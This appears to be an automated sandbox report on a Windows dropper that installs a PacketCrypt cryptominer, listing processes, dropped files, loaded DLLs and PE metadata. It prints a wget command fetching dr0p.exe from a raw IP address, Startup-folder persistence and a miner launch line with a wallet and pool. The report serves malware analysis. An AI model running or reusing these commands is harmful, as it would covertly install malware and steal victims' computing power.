Source: pkt1.exe, 00000006.00000002.3221267777.0000025676052000.00000002.00000001.01000000.00000007.sdmp, packetcrypt.exe, 00000008.00000002.3220492257.000002451C5C8000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3220492257.000002451C5A6000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000000.2411177944.00007FF632E74000.00000002.00000001.01000000.0000000E.sdmp, packetcrypt.exe, 00000008.00000003.2556654359.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869330836.000002451C600000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2556654359.000002451C617000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3220492257.000002451C5FE000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3220492257.000002451C617000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3220492257.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223014589.000002451F0BB000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869330836.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2556654359.000002451C5FF000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223014589.000002451F090000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223014589.000002451F070000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869330836.000002451C617000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel

Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe

Process Stats: CPU usage > 49%

Source: pkt1.exe.4.dr

Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: System.Runtime.InteropServices.dll.6.dr	Static PE information: No import functions for PE file found
Source: System.Private.CoreLib.dll.6.dr	Static PE information: No import functions for PE file found
Source: System.Private.Uri.dll.6.dr	Static PE information: No import functions for PE file found
Source: System.Runtime.InteropServices.JavaScript.dll.6.dr	Static PE information: No import functions for PE file found
Source: dr0p.exe.2.dr	Static PE information: No import functions for PE file found
Source: System.ObjectModel.dll.6.dr	Static PE information: No import functions for PE file found
Source: System.Runtime.Numerics.dll.6.dr	Static PE information: No import functions for PE file found
Source: System.Net.WebSockets.dll.6.dr	Static PE information: No import functions for PE file found
Source: System.Private.DataContractSerialization.dll.6.dr	Static PE information: No import functions for PE file found
Source: System.Private.Xml.Linq.dll.6.dr	Static PE information: No import functions for PE file found
Source: System.Runtime.CompilerServices.VisualC.dll.6.dr	Static PE information: No import functions for PE file found

Source: classification engine

Classification label: mal68.troj.adwa.win@11/176@2/3

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Desktop\cmdline.out

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

File created: C:\Users\user\AppData\Local\Temp\.net

Jump to behavior

Source: packetcrypt.exe, 00000008.00000000.2411177944.00007FF632E74000.00000002.00000001.01000000.0000000E.sdmp	Memory string: rustls::msgs::handshakeP7
Source: packetcrypt.exe, 00000008.00000000.2411177944.00007FF632E74000.00000002.00000001.01000000.0000000E.sdmp	Memory string: rustls::msgs::handshake

Source: C:\Users\user\Desktop\download\dr0p.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\wget.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://23.27.51.244/dr0p.exe" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://23.27.51.244/dr0p.exe"
Source: unknown	Process created: C:\Users\user\Desktop\download\dr0p.exe "C:\Users\user\Desktop\download\dr0p.exe"
Source: C:\Users\user\Desktop\download\dr0p.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Process created: C:\Users\user\AppData\Local\Temp\packetcrypt.exe "C:\Users\user\AppData\Local\Temp\packetcrypt.exe" ann -p pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a http://pool.pkt.world
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://23.27.51.244/dr0p.exe"	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Process created: C:\Users\user\AppData\Local\Temp\packetcrypt.exe "C:\Users\user\AppData\Local\Temp\packetcrypt.exe" ann -p pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a http://pool.pkt.world	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wget.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32

Jump to behavior

Source:	Binary string: /_/artifacts/obj/System.Runtime.Handles/Release/net8.0-windows/System.Runtime.Handles.pdbSHA256 source: System.Runtime.Handles.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: System.Private.Xml.dll.6.dr
Source:	Binary string: System.Diagnostics.Process.ni.pdb source: pkt1.exe, 00000006.00000002.3265014655.00007FF8B7E01000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: System.ComponentModel.Primitives.ni.pdb source: pkt1.exe, 00000006.00000002.3265265471.00007FF8BA511000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: System.Net.NetworkInformation.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Runtime.Handles/Release/net8.0-windows/System.Runtime.Handles.pdb source: System.Runtime.Handles.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: pkt1.exe, 00000006.00000002.3220795521.0000025674022000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\Release\net8.0\System.Xml.XDocument.pdbSHA256 source: System.Xml.XDocument.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: pkt1.exe, 00000006.00000002.3264924713.00007FF8B78A1000.00000020.00000001.01000000.0000000A.sdmp, System.Console.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: pkt1.exe, pkt1.exe, 00000006.00000000.2352610404.00007FF6473C8000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: System.Net.Http.Json.ni.pdb source: System.Net.Http.Json.dll.6.dr
Source:	Binary string: System.IO.MemoryMappedFiles.ni.pdb source: System.IO.MemoryMappedFiles.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Reflection.Extensions/Release/net8.0-windows/System.Reflection.Extensions.pdbSHA256> source: System.Reflection.Extensions.dll.6.dr
Source:	Binary string: C:\Users\Admin.DESKTOP-9H4MNNT\Desktop\1111\PacketCryptApp\obj\Release\net8.0\win-x64\PacketCryptApp.pdbSHA256_u source: pkt1.exe, 00000006.00000002.3221267777.0000025677452000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: /_/artifacts/obj/System.Security.Cryptography.OpenSsl/Release/net8.0-windows/System.Security.Cryptography.OpenSsl.pdb source: System.Security.Cryptography.OpenSsl.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\Release\net8.0\System.Xml.XDocument.pdb source: System.Xml.XDocument.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: pkt1.exe, 00000006.00000002.3265014655.00007FF8B7E01000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: pkt1.exe, 00000006.00000002.3220861008.0000025674032000.00000002.00000001.01000000.00000010.sdmp, Microsoft.Win32.Primitives.dll.6.dr
Source:	Binary string: System.Memory.ni.pdb source: pkt1.exe, 00000006.00000002.3264827588.00007FF8B7821000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: pkt1.exe, 00000006.00000002.3220953516.0000025674042000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/artifacts/obj/System.Diagnostics.Tools/Release/net8.0-windows/System.Diagnostics.Tools.pdb source: System.Diagnostics.Tools.dll.6.dr
Source:	Binary string: System.Private.CoreLib.ni.pdb source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr
Source:	Binary string: System.Private.Xml.ni.pdb source: System.Private.Xml.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Security.Cryptography.OpenSsl/Release/net8.0-windows/System.Security.Cryptography.OpenSsl.pdbSHA256 source: System.Security.Cryptography.OpenSsl.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdbSHA256<t source: System.Numerics.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.MemoryMappedFiles\Release\net8.0-windows\System.IO.MemoryMappedFiles.pdb source: System.IO.MemoryMappedFiles.dll.6.dr
Source:	Binary string: System.Collections.Specialized.ni.pdb source: System.Collections.Specialized.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: System.Net.Http.Json.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Reflection.Extensions/Release/net8.0-windows/System.Reflection.Extensions.pdb source: System.Reflection.Extensions.dll.6.dr
Source:	Binary string: System.Runtime.InteropServices.ni.pdb source: pkt1.exe, 00000006.00000002.3265112566.00007FF8B9F61000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: pkt1.exe, 00000006.00000002.3265197772.00007FF8BA4F1000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: /_/artifacts/obj/System.Globalization.Extensions/Release/net8.0-windows/System.Globalization.Extensions.pdb source: System.Globalization.Extensions.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Diagnostics.Tools/Release/net8.0-windows/System.Diagnostics.Tools.pdbSHA256 source: System.Diagnostics.Tools.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.WebHeaderCollection\Release\net8.0\System.Net.WebHeaderCollection.pdb source: System.Net.WebHeaderCollection.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: pkt1.exe, 00000006.00000002.3264827588.00007FF8B7821000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: pkt1.exe, 00000006.00000002.3222444888.00000256780F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.WebHeaderCollection.ni.pdb source: System.Net.WebHeaderCollection.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: pkt1.exe, 00000006.00000002.3265265471.00007FF8BA511000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.MemoryMappedFiles\Release\net8.0-windows\System.IO.MemoryMappedFiles.pdbSHA2562R4c source: System.IO.MemoryMappedFiles.dll.6.dr
Source:	Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdbSHA256%# source: pkt1.exe, 00000006.00000002.3222444888.00000256780F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Console.ni.pdb source: pkt1.exe, 00000006.00000002.3264924713.00007FF8B78A1000.00000020.00000001.01000000.0000000A.sdmp, System.Console.dll.6.dr
Source:	Binary string: System.Threading.ni.pdb source: pkt1.exe, 00000006.00000002.3265197772.00007FF8BA4F1000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: pkt1.exe, 00000006.00000002.3220795521.0000025674022000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: /_/artifacts/obj/System.Globalization.Extensions/Release/net8.0-windows/System.Globalization.Extensions.pdbSHA256{= source: System.Globalization.Extensions.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: pkt1.exe, 00000006.00000002.3265112566.00007FF8B9F61000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: System.Numerics.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: System.Collections.Specialized.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: pkt1.exe, 00000006.00000002.3220953516.0000025674042000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdbSHA256%B source: pkt1.exe, 00000006.00000002.3220861008.0000025674032000.00000002.00000001.01000000.00000010.sdmp, Microsoft.Win32.Primitives.dll.6.dr
Source:	Binary string: C:\Users\Admin.DESKTOP-9H4MNNT\Desktop\1111\PacketCryptApp\obj\Release\net8.0\win-x64\PacketCryptApp.pdb source: pkt1.exe, 00000006.00000002.3221267777.0000025677452000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: System.Net.NetworkInformation.ni.pdb source: System.Net.NetworkInformation.dll.6.dr

Source: dr0p.exe.2.dr

Static PE information: 0xE22DA30F [Fri Mar 31 11:07:59 2090 UTC]

Source: dr0p.exe.2.dr

Static PE information: real checksum: 0xc3e77c5a should be: 0xff85

Source: pkt1.exe.4.dr	Static PE information: section name: .CLR_UEF
Source: pkt1.exe.4.dr	Static PE information: section name: .didat
Source: pkt1.exe.4.dr	Static PE information: section name: Section
Source: pkt1.exe.4.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.CompilerServices.VisualC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Quic.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Serialization.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.XmlSerializer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.InteropServices.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.TraceSource.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Private.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.Encoding.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Data.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.HttpListener.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.Encoding.CodePages.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Contracts.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.OpenSsl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.RegularExpressions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.DriveInfo.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Pipes.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Process.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Emit.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.VisualBasic.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.WebProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.NetworkInformation.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Mail.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.StackTrace.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Resources.Reader.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.TypeConverter.dll	Jump to dropped file
Source: C:\Users\user\Desktop\download\dr0p.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.AppContext.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ServiceProcess.dll	Jump to dropped file
